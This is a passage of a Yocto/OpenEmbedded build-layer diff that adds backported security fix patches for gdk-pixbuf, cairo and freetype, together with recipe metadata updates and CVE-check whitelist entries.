+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ephy-string.c b/lib/ephy-string.c
+index 35a148ab32..8e524d52ca 100644
+--- a/lib/ephy-string.c
++++ b/lib/ephy-string.c
+@@ -114,11 +114,10 @@ ephy_string_shorten (char *str,
+ /* create string */
+ bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
+
+- /* +1 for ellipsis, +1 for trailing NUL */
+- new_str = g_new (gchar, bytes + 1 + 1);
++ new_str = g_new (gchar, bytes + strlen ("…") + 1);
+
+ strncpy (new_str, str, bytes);
+- strcat (new_str, "…");
++ strncpy (new_str + bytes, "…", strlen ("…") + 1);
+
+ g_free (str);
+
+--
+GitLab
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
new file mode 100644
index 0000000000..3fef2bc1eb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
@@ -0,0 +1,55 @@
+From bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81 Mon Sep 17 00:00:00 2001
+From: Robert Ancell <robert.ancell@canonical.com>
+Date: Mon, 30 Nov 2020 12:26:12 +1300
+Subject: [PATCH 02/13] gif: Fix LZW decoder accepting invalid LZW code.
+
+The code value after a reset wasn't being validated, which means we would
+accept invalid codes. This could cause an infinite loop in the decoder.
+
+Fixes CVE-2020-29385
+
+Fixes https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/164
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81]
+CVE: CVE-2020-29385
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gdk-pixbuf/lzw.c | 13 +++++++------
+ 1 files changed, 7 insertions(+), 6 deletions(-)
+ create mode 100644 tests/test-images/fail/hang_114.gif
+
+diff --git a/gdk-pixbuf/lzw.c b/gdk-pixbuf/lzw.c
+index 9e052a6f7..105daf2b1 100644
+--- a/gdk-pixbuf/lzw.c
++++ b/gdk-pixbuf/lzw.c
+@@ -195,19 +195,20 @@ lzw_decoder_feed (LZWDecoder *self,
+ if (self->last_code != self->clear_code && self->code_table_size < MAX_CODES) {
+ if (self->code < self->code_table_size)
+ add_code (self, self->code);
+- else if (self->code == self->code_table_size)
++ else
+ add_code (self, self->last_code);
+- else {
+- /* Invalid code received - just stop here */
+- self->last_code = self->eoi_code;
+- return output_length;
+- }
+
+ /* When table is full increase code size */
+ if (self->code_table_size == (1 << self->code_size) && self->code_size < LZW_CODE_MAX)
+ self->code_size++;
+ }
+
++ /* Invalid code received - just stop here */
++ if (self->code >= self->code_table_size) {
++ self->last_code = self->eoi_code;
++ return output_length;
++ }
++
+ /* Convert codeword into indexes */
+ n_written += write_indexes (self, output + n_written, output_length - n_written);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
+Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+
+ /* If no rendered frame, render the first frame */
+ if (anim->last_frame == NULL) {
++ gsize len = 0;
+ if (anim->last_frame_data == NULL)
+ anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+ if (anim->last_frame_data == NULL)
+ return NULL;
+- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++ else
++ return NULL;
+ composite_frame (anim, g_list_nth_data (anim->frames, 0));
+ }
+
+--
+GitLab
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
new file mode 100644
index 0000000000..b29ab209ce
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
+From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 9 Aug 2022 09:45:42 +0530
+Subject: [PATCH] CVE-2021-46829
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
+CVE: CVE-2021-46829
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index d742963..9544391 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ for (i = 0; i < n_indexes; i++) {
+ guint8 index = index_buffer[i];
+ guint x, y;
+- int offset;
++ gsize offset;
+
+ if (index == frame->transparent_index)
+ continue;
+@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ if (x >= anim->width || y >= anim->height)
+ continue;
+
+- offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
+- pixels[offset + 0] = frame->color_map[index * 3 + 0];
+- pixels[offset + 1] = frame->color_map[index * 3 + 1];
+- pixels[offset + 2] = frame->color_map[index * 3 + 2];
+- pixels[offset + 3] = 255;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, x * 4)) {
++ pixels[offset + 0] = frame->color_map[index * 3 + 0];
++ pixels[offset + 1] = frame->color_map[index * 3 + 1];
++ pixels[offset + 2] = frame->color_map[index * 3 + 2];
++ pixels[offset + 3] = 255;
++ }
+ }
+
+ out:
+@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
+ y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
+ for (y = anim->last_frame->y_offset; y < y_end; y++) {
+- guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
+- memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
++ gsize offset;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
++ memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
++ }
+ }
+ break;
+ case GDK_PIXBUF_FRAME_REVERT:
+--
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 0405fa78b5..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -24,6 +24,9 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
file://0004-Do-not-run-tests-when-building.patch \
file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
file://missing-test-data.patch \
+ file://CVE-2020-29385.patch \
+ file://CVE-2021-20240.patch \
+ file://CVE-2021-46829.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "GTK+ icon theme"
+DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
+This package package contains an icon theme for Gtk+ 3 applications."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
SECTION = "x11/gnome"
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
# from the target sysroot.
cat > ${B}/g-ir-scanner-wrapper << EOF
#!/bin/sh
-# This prevents g-ir-scanner from writing cache data to $HOME
+# This prevents g-ir-scanner from writing cache data to user's HOME dir
export GI_SCANNER_DISABLE_CACHE=1
g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library for sending desktop notifications to a notification daemon"
+DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
+in the Desktop Notifications spec. These notifications can be used to inform \
+the user about an event or display some form of information without getting \
+in the user's way."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
RPROVIDES_${PN} += "libnotify3"
RCONFLICTS_${PN} += "libnotify3"
RREPLACES_${PN} += "libnotify3"
+
+# -7381 is specific to the NodeJS bindings
+CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2018-1000041"
+
CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
PACKAGECONFIG ??= "gdkpixbuf"
diff --git a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
index 72511af02d..8b5d301515 100644
--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
tokens and other types of secrets. libsecret provides a convenient wrapper \
for these methods so consumers do not have to call the low-level DBus methods."
LICENSE = "LGPLv2.1"
+HOMEPAGE = "https://github.com/GNOME/libsecret"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
diff --git a/meta/recipes-graphics/builder/builder_0.1.bb b/meta/recipes-graphics/builder/builder_0.1.bb
index 0a64c31ab3..9d5cd8cde6 100644
--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
}
+# -4178 is an unrelated 'builder'
+CVE_CHECK_WHITELIST = "CVE-2008-4178"
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
-There is a potential infinite-loop in function _arc_error_normalized().
+There is an assertion in function _cairo_arc_in_direction().
CVE: CVE-2019-6461
Upstream-Status: Pending
Signed-off-by: Ross Burton <ross.burton@intel.com>
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..f9249dbeb 100644
+index 390397bae..1bde774a4 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
- do {
- angle = M_PI / i++;
- error = _arc_error_normalized (angle);
-- } while (error > tolerance);
-+ } while (error > tolerance && error > __DBL_EPSILON__);
+@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
+ if (cairo_status (cr))
+ return;
- return angle;
- }
+- assert (angle_max >= angle_min);
++ if (angle_max < angle_min)
++ return;
+
+ if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
+ angle_max = fmod (angle_max - angle_min, 2 * M_PI);
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
-There is an assertion in function _cairo_arc_in_direction().
-
CVE: CVE-2019-6462
-Upstream-Status: Pending
-Signed-off-by: Ross Burton <ross.burton@intel.com>
+Upstream-Status: Backport
+Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
+
+From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <hlewin@gmx.de>
+Date: Sun, 1 Aug 2021 11:16:03 +0000
+Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
+
+---
+ src/cairo-arc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..1bde774a4 100644
+index 390397bae..1c891d1a0 100644
--- a/src/cairo-arc.c
+++ b/src/cairo-arc.c
-@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
- if (cairo_status (cr))
- return;
+@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
+ { M_PI / 11.0, 9.81410988043554039085e-09 },
+ };
+ int table_size = ARRAY_LENGTH (table);
++ const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
-- assert (angle_max >= angle_min);
-+ if (angle_max < angle_min)
-+ return;
+ for (i = 0; i < table_size; i++)
+ if (table[i].error < tolerance)
+ return table[i].angle;
- if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
- angle_max = fmod (angle_max - angle_min, 2 * M_PI);
+ ++i;
++
+ do {
+ angle = M_PI / i++;
+ error = _arc_error_normalized (angle);
+- } while (error > tolerance);
++ } while (error > tolerance && i < max_segments);
+
+ return angle;
+ }
+--
+2.38.1
+
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
new file mode 100644
index 0000000000..fb6ce5cfdf
--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
+Fix stack buffer overflow.
+
+CVE: CVE-2020-35492
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <heiko.lewin@worldiety.de>
+Date: Tue, 15 Dec 2020 16:48:19 +0100
+Subject: [PATCH] Fix mask usage in image-compositor
+
+---
+ src/cairo-image-compositor.c | 8 ++--
+ test/Makefile.sources | 1 +
+ test/bug-image-compositor.c | 39 ++++++++++++++++++++
+ test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
+ 4 files changed, 44 insertions(+), 4 deletions(-)
+ create mode 100644 test/bug-image-compositor.c
+ create mode 100644 test/reference/bug-image-compositor.ref.png
+
+diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
+index 79ad69f68..4f8aaed99 100644
+--- a/src/cairo-image-compositor.c
++++ b/src/cairo-image-compositor.c
+@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ unsigned num_spans)
+ {
+ cairo_image_span_renderer_t *r = abstract_renderer;
+- uint8_t *m;
++ uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
+ int x0;
+
+ if (num_spans == 0)
+ return CAIRO_STATUS_SUCCESS;
+
+ x0 = spans[0].x;
+- m = r->_buf;
++ m = base;
+ do {
+ int len = spans[1].x - spans[0].x;
+ if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
+@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ spans[0].x, y,
+ spans[1].x - spans[0].x, h);
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else if (spans[0].coverage == 0x0) {
+ if (spans[0].x != x0) {
+@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ #endif
+ }
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else {
+ *m++ = spans[0].coverage;
+--
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
file://CVE-2018-19876.patch \
file://CVE-2019-6461.patch \
file://CVE-2019-6462.patch \
+ file://CVE-2020-35492.patch \
"
SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
SUMMARY = "GStreamer integration library for Clutter"
+DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
+It provides a GStreamer sink to upload frames to GL and an actor that \
+implements the ClutterGstPlayer interface using playbin."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
LICENSE = "LGPLv2+"
inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
+DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
+applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding the \
+a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
+actor for embedding any GtkWidget inside a Clutter stage."
HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
LICENSE = "LGPLv2+"
CLUTTERBASEBUILDCLASS = "meson"
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
This is CVE-2020-15999.
* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
+CVE: CVE-2020-15999
Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
---
src/sfnt/pngshim.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
new file mode 100644
index 0000000000..e66400ddb1
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
+From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Thu, 17 Mar 2022 19:24:16 +0100
+Subject: [PATCH] [sfnt] Avoid invalid face index.
+
+Fixes #1138.
+
+* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
+Check `face_index` before decrementing.
+
+CVE: CVE-2022-27404
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
+Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/sfnt/sfobjs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
+index f9d4d3858..9771c35df 100644
+--- a/src/sfnt/sfobjs.c
++++ b/src/sfnt/sfobjs.c
+@@ -566,7 +566,7 @@
+ face_index = FT_ABS( face_instance_index ) & 0xFFFF;
+
+ /* value -(N+1) requests information on index N */
+- if ( face_instance_index < 0 )
++ if ( face_instance_index < 0 && face_index > 0 )
+ face_index--;
+
+ if ( face_index >= face->ttc_header.count )
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
new file mode 100644
index 0000000000..08fccd5a3b
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
+From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 06:40:17 +0100
+Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
+ `face_index`.
+We must ensure that the cast to `FT_Int` doesn't change the sign.
+Fixes #1139.
+
+CVE: CVE-2022-27405
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 2c0f0e6c9..10952a6c6 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -2527,6 +2527,15 @@
+ #endif
+
+
++ /* only use lower 31 bits together with sign bit */
++ if ( face_index > 0 )
++ face_index &= 0x7FFFFFFFL;
++ else
++ {
++ face_index &= 0x7FFFFFFFL;
++ face_index = -face_index;
++ }
++
+ #ifdef FT_DEBUG_LEVEL_TRACE
+ FT_TRACE3(( "FT_Open_Face: " ));
+ if ( face_index < 0 )
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
new file mode 100644
index 0000000000..4b5e629f30
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
+From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 09:37:28 +0100
+Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
+
+Fixes #1140.
+
+CVE: CVE-2022-27406
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 6492a1517..282c9121a 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -3409,6 +3409,9 @@
+ if ( !face )
+ return FT_THROW( Invalid_Face_Handle );
+
++ if ( !face->size )
++ return FT_THROW( Invalid_Size_Handle );
++
+ if ( !req || req->width < 0 || req->height < 0 ||
+ req->type >= FT_SIZE_REQUEST_TYPE_MAX )
+ return FT_THROW( Invalid_Argument );
+--
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
new file mode 100644
index 0000000000..800d77579e
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
+From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Mon, 14 Nov 2022 19:18:19 +0100
+Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
+ overflow.
+
+Reported as
+
+ https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
+
+Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
+CVE: CVE-2023-2004
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/truetype/ttgxvar.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
+index 78d87dc..258d701 100644
+--- a/src/truetype/ttgxvar.c
++++ b/src/truetype/ttgxvar.c
+@@ -43,6 +43,7 @@
+ #include FT_INTERNAL_DEBUG_H
+ #include FT_CONFIG_CONFIG_H
+ #include FT_INTERNAL_STREAM_H
++#include <freetype/internal/ftcalc.h>
+ #include FT_INTERNAL_SFNT_H
+ #include FT_TRUETYPE_TAGS_H
+ #include FT_TRUETYPE_IDS_H
+@@ -1065,7 +1066,7 @@
+ delta == 1 ? "" : "s",
+ vertical ? "VVAR" : "HVAR" ));
+
+- *avalue += delta;
